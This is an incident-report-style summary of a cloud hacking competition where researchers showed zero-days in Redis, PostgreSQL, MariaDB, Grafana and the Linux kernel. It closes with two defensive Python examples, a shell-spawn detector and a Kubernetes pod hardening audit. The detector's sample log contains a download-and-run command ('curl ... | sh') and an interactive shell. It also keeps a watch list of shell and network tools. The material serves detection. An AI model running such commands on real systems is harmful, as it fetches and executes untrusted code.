Hackers awarded $320,000 at first-of-its-kind cloud hacking competition
# Incident Report: Cloud Infrastructure Zero-Day Discovery Competition
## Executive Summary
This report summarizes the first-of-its-kind cloud hacking competition, ZeroDay.cloud, hosted by Wiz Research in partnership with AWS, Microsoft, and Google Cloud. Over two days, researchers demonstrated 11 critical zero-day vulnerabilities in foundational cloud technologies and earned $320,000 in rewards. The demonstrated outcomes were remote code execution in widely deployed databases (Redis, PostgreSQL, MariaDB), which exposes every record and secret those databases hold, and a Linux Kernel exploit that escaped a container onto its host.
## Incident Details
- **Discovery Date:** December 2025 (the two competition days)
- **Incident Date:** December 2025 (during the live sessions)
- **Affected Organization:** Open-source projects whose components underpin cloud services: Redis, PostgreSQL, MariaDB, Grafana, and the Linux Kernel. No enterprise victim; all exploitation took place against controlled competition targets.
- **Sector:** Technology (Cloud Infrastructure, Databases, AI/ML Services)
- **Geography:** London (Location of the competition)
## Timeline of Events
The competition ran over two days.
### Initial Access
- **Date/Time:** Days 1 and 2 of the competition
- **Vector:** Exploitation of logic flaws and memory-safety bugs in popular open-source cloud technologies. Targets included Redis, PostgreSQL, MariaDB, Grafana, and the Linux Kernel.
- **Details:** Researchers achieved Remote Code Execution (RCE) against the database targets; some entries, such as Grafana, first required valid credentials. The most severe result was a Linux Kernel exploit that escaped the container onto the host.
### Lateral Movement
- **Vector:** Lateral movement after exploitation was not part of the exercise. RCE inside a database process, however, yields the credentials and data of every application that uses that database, and the Linux Kernel exploit crossed the container isolation boundary.
- **Details:** Once on the host, an attacker in a shared multi-tenant deployment is positioned to reach the other containers on that node and the infrastructure that manages them. The competition demonstrated the escape itself, not movement to other tenants.
### Data Exfiltration/Impact
- **Impact:** RCE in a database process grants "keys to the kingdom": read and write access to everything the database holds, including user records, password hashes, secrets, and PII. The Linux Kernel container escape broke the isolation guarantee that multi-tenant cloud services rest on.
- **Failed Attempts:** Attempts to exploit vLLM and Ollama (AI/ML inference frameworks) to reach private AI artifacts (models, datasets, prompts) did not succeed within the competition's time limit.
### Detection & Response
- **Detection:** The vulnerabilities were demonstrated live by the competing researchers; as in other live-hacking formats, the underlying research is assumed to have preceded the event.
- **Response actions taken:** Wiz Research and the project maintainers validated each successful entry on the spot, and the findings were reported to the respective open-source projects for patching under coordinated disclosure.
## Attack Methodology
*Note: As this was a controlled red-team exercise, the methodology below describes the techniques the researchers used to mimic real-world attacks.*
- **Initial Access:** RCE via vulnerabilities in Database engines (Redis, PostgreSQL, MariaDB) and core OS (Linux Kernel). Specific entry required successful authentication for some RCEs (e.g., Grafana).
- **Persistence:** Not explicitly detailed, though RCE often allows for the establishment of persistent backdoors.
- **Privilege Escalation:** Achieved via the Linux Kernel exploit leading to **Container Escape**, breaking out of the single-user isolation boundary to the host infrastructure.
- **Defense Evasion:** No specific evasion techniques were reported; 85% of the exploit attempts succeeded against the targets as configured for the competition.
- **Credential Access:** Implied outcome of RCE in databases (access to secrets and passwords stored/accessible by the database process).
- **Discovery:** Not reported; researchers are assumed to have identified the targets and vulnerable versions before the event.
- **Lateral Movement:** Demonstrated container escape to the host via the Linux Kernel exploit; on a node shared by several tenants, that position implies reach into other tenants' workloads, although cross-tenant movement itself was not demonstrated.
- **Collection:** Successful on databases containing critical application data.
- **Exfiltration:** Implied, as RCE leads to data access, though the ultimate exfiltration step was not the focus of the reporting.
- **Impact:** Complete system compromise potential (RCE) and violation of cloud isolation guarantees (Container Escape).
## Impact Assessment
- **Financial:** $320,000 awarded to researchers in competition prizes. No direct enterprise financial loss, as this was a controlled event.
- **Data Breach:** High potential. Successful database RCE grants access to sensitive PII, passwords, and secrets.
- **Operational:** Proven ability to disrupt the core operational promise of multi-tenant cloud environments (isolation).
- **Reputational:** Highlighted the risk associated with fundamental open-source cloud technology, reinforcing the need for speed in vulnerability management.
## Indicators of Compromise
*No indicators of compromise were produced, as this was a controlled research event. The classes of vulnerability that succeeded do point to what to watch for:*
- **Network indicators (Defanged):** None published. Monitor for commands or queries reaching Redis, PostgreSQL, MariaDB, or Grafana from clients that are not their usual application tier, and for outbound connections initiated by those services.
- **File indicators:** N/A (the exploits were memory-corruption and logic flaws leading directly to execution).
- **Behavioral indicators:** Database or application processes (postgres, redis-server, mariadbd, Grafana) spawning shells, interpreters, or network tools; a successful login followed within seconds by such a spawn; a container process performing host-level operations (namespace changes, mounts, module loading) that its workload never needs.
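One way to operationalize the behavioral indicators above, as an added example written for this report (not code from the competition, Wiz Research, or any project named): correlate process-exec telemetry with service login records and flag a database process that spawns a shell, especially right after a successful login. The process names, both log formats, and the 10-second correlation window are assumptions; the sample logs are constructed.

```python
"""Flag database processes that spawn shells, correlated with a fresh login.

Added example for this report; not code from the competition, Wiz Research,
or any of the projects named. Both log formats are constructed for the example
and do not follow any vendor's schema.
"""
from dataclasses import dataclass

# Process names of the services the competition targeted (assumption: these are
# the comm values an exec hook such as auditd or an eBPF tracer would report).
DB_PROCESSES = {"postgres", "redis-server", "mariadbd", "mysqld", "grafana"}
# Children a database process has no business starting.
SHELLS_AND_TOOLS = {"sh", "bash", "dash", "curl", "wget", "nc", "ncat", "python3", "perl"}
# A shell spawned this soon after a successful login is the "auth then RCE"
# pattern; the window is an assumption, tune it to the environment.
CORRELATION_WINDOW_S = 10

# Constructed sample logs, not real telemetry.
# auth line: <epoch> <service> login <ok|fail> <key=value ...>
AUTH_LOG = """\
1701000000 postgres login ok user=app src=10.0.0.7
1701000020 redis-server login ok user=default src=10.0.0.9
1701000100 mariadbd login fail user=root src=10.0.0.9
"""
# exec line: <epoch> <parent_comm> <child_comm> <uid> <argv>
EXEC_LOG = """\
1701000001 postgres postgres 999 postgres: walwriter
1701000003 postgres sh 999 sh -c id
1701000022 redis-server bash 999 bash -c curl http://10.0.0.5/p | sh
1701000050 nginx nginx 33 nginx: worker process
1701000105 mariadbd sh 999 sh -i
"""


@dataclass
class Finding:
    ts: int
    rule: str
    parent: str
    child: str
    detail: str


def parse_auth(text):
    """Return (ts, service, details) for each successful login."""
    logins = []
    for line in text.splitlines():
        ts, service, kind, result, *rest = line.split()
        if kind == "login" and result == "ok":
            logins.append((int(ts), service, " ".join(rest)))
    return logins


def parse_exec(text):
    """Return (ts, parent, child, uid, argv) per exec event; argv keeps its spaces."""
    events = []
    for line in text.splitlines():
        ts, parent, child, uid, argv = line.split(maxsplit=4)
        events.append((int(ts), parent, child, int(uid), argv))
    return events


def detect(auth_text, exec_text):
    """Apply the two behavioral indicators and return findings in time order."""
    logins = parse_auth(auth_text)
    findings = []
    for ts, parent, child, _uid, argv in parse_exec(exec_text):
        if parent not in DB_PROCESSES or child not in SHELLS_AND_TOOLS:
            continue
        # Most recent successful login to the same service inside the window.
        recent = [entry for entry in logins
                  if entry[1] == parent and 0 <= ts - entry[0] <= CORRELATION_WINDOW_S]
        if recent:
            login_ts, _, who = recent[-1]
            findings.append(Finding(ts, "post_auth_rce", parent, child,
                                    f"{argv!r} {ts - login_ts}s after login ({who})"))
        else:
            findings.append(Finding(ts, "db_spawned_shell", parent, child, argv))
    return findings


if __name__ == "__main__":
    for f in detect(AUTH_LOG, EXEC_LOG):
        print(f"{f.ts} {f.rule:18} {f.parent} -> {f.child}: {f.detail}")
```

On the sample data this yields two `post_auth_rce` findings (postgres and redis-server, 3 s and 2 s after their logins) and one `db_spawned_shell` for mariadbd, whose preceding login failed and therefore does not correlate. In production the parent-name list should come from the actual workload inventory, and the exec source should be a kernel-level hook rather than anything the database process itself can tamper with.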
## Response Actions
The primary response actions were immediate and collaborative, involving defenders and researchers:
- **Containment:** Findings were disclosed to the project maintainers and the cloud partners (AWS, Microsoft, and Google Cloud) for remediation.
- **Eradication:** Apply the fixed releases of the affected projects (PostgreSQL, Redis, MariaDB, Grafana, Linux Kernel) once the maintainers publish them; until then, limit network exposure of the affected services and the privileges of the accounts that can reach them.
- **Recovery:** N/A (no production systems were compromised).
## Lessons Learned
- **AI Acceleration:** AI is shortening the time it takes both attackers and defenders to find zero-days, so response timelines must shrink to match.
- **Core Component Risk:** Flaws in foundational, widely adopted open-source components (databases, OS kernel) represent the highest severity risks, potentially granting "keys to the kingdom."
- **Container Isolation Limits:** A container shares its kernel with the host, so one kernel bug is enough to reach the host. Containers alone are not a sufficient tenant boundary in multi-tenant cloud environments; additional isolation layers (sandboxed runtimes, microVMs, or dedicated nodes per tenant) are critical.
## Recommendations
- **Accelerated Patching Cadence:** Match the speed of discovery: deploy fixes for critical infrastructure components in hours, not weeks. That requires an inventory of where each component runs and a tested rollout path before the advisory lands.
- **Layered Defense:** Assume containers can be compromised. Restrict what each workload can do (no privileged containers, no host namespaces, capabilities dropped, seccomp applied), add runtime detection, segment the network so a compromised service cannot reach its neighbours, and track drift with cloud-native security posture management.
- **Focus on Foundational Tech:** Prioritize security review and vetting of the open-source components in core infrastructure, especially databases and the underlying operating system.
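The container-isolation lesson and the layered-defense recommendation above can be checked mechanically before a workload is admitted. The following is an added example, not code from the report, Wiz Research, or the cloud partners: a pod-spec audit that flags the settings which let a container escape reach the host unhindered, run against a constructed weak spec and its hardened counterpart. The specs are Python dicts mirroring Kubernetes PodSpec and SecurityContext field names, and the RuntimeClass name `gvisor` is an assumption that must exist in the target cluster.

```python
"""Audit a Kubernetes pod spec for settings that turn one kernel bug into a
host compromise.

Added example for this report; not code from Wiz Research, the cloud partners,
or the projects named. The pod specs are constructed Python dicts that mirror
PodSpec and SecurityContext field names, so no cluster is needed to run it.
"""

# Constructed: a database pod as it is too often deployed.
WEAK_POD = {
    "metadata": {"name": "db"},
    "spec": {
        "hostPID": True,
        "containers": [{
            "name": "db",
            "image": "postgres:16",
            "securityContext": {"privileged": True},
        }],
    },
}

# Constructed: the same pod with the layers this report recommends.
# The RuntimeClass name is an assumption; it must be defined in the cluster.
HARDENED_POD = {
    "metadata": {"name": "db"},
    "spec": {
        "runtimeClassName": "gvisor",
        "automountServiceAccountToken": False,
        "securityContext": {
            "runAsNonRoot": True,
            "seccompProfile": {"type": "RuntimeDefault"},
        },
        "containers": [{
            "name": "db",
            "image": "postgres:16",
            "securityContext": {
                "allowPrivilegeEscalation": False,
                "readOnlyRootFilesystem": True,
                "capabilities": {"drop": ["ALL"]},
            },
        }],
    },
}


def audit_pod(pod):
    """Return a list of findings; an empty list means every check passed."""
    spec = pod["spec"]
    pod_sc = spec.get("securityContext", {})
    findings = []

    # Host namespaces hand an escaped process the host's view directly.
    for flag in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(flag):
            findings.append(f"pod: {flag} shares a host namespace")
    # Without a sandboxed runtime the container shares the host kernel,
    # so a single kernel bug is the entire boundary.
    if not spec.get("runtimeClassName"):
        findings.append("pod: no runtimeClassName, container shares the host kernel")
    # Kubernetes mounts the token by default; a process with RCE then holds
    # API credentials for the next hop.
    if spec.get("automountServiceAccountToken", True):
        findings.append("pod: service account token auto-mounted")

    for c in spec.get("containers", []):
        name, sc = c["name"], c.get("securityContext", {})
        # seccomp may be set at pod or container level; either satisfies the check.
        seccomp = (sc.get("seccompProfile") or pod_sc.get("seccompProfile") or {}).get("type")
        if seccomp not in ("RuntimeDefault", "Localhost"):
            findings.append(f"{name}: no seccomp profile, full syscall surface exposed")
        if sc.get("privileged"):
            findings.append(f"{name}: privileged (all capabilities, all host devices)")
        if sc.get("allowPrivilegeEscalation", True):
            findings.append(f"{name}: allowPrivilegeEscalation not false")
        if "ALL" not in sc.get("capabilities", {}).get("drop", []):
            findings.append(f"{name}: capabilities not dropped")
        if not sc.get("readOnlyRootFilesystem"):
            findings.append(f"{name}: writable root filesystem")
        if not (sc.get("runAsNonRoot") or pod_sc.get("runAsNonRoot")):
            findings.append(f"{name}: may run as root")
    return findings


if __name__ == "__main__":
    for label, pod in (("weak", WEAK_POD), ("hardened", HARDENED_POD)):
        print(label, audit_pod(pod) or "OK")
```

The weak spec produces nine findings and the hardened spec none. Two caveats when applying this to real database images: `readOnlyRootFilesystem` and `runAsNonRoot` usually require writable `emptyDir` volumes for the data and socket directories and an explicit non-root `runAsUser`, and seccomp plus dropped capabilities only shrink the kernel surface a process can reach, which is why the RuntimeClass check (a separate kernel or sandbox between the workload and the host) is the one that addresses the escape class this competition demonstrated.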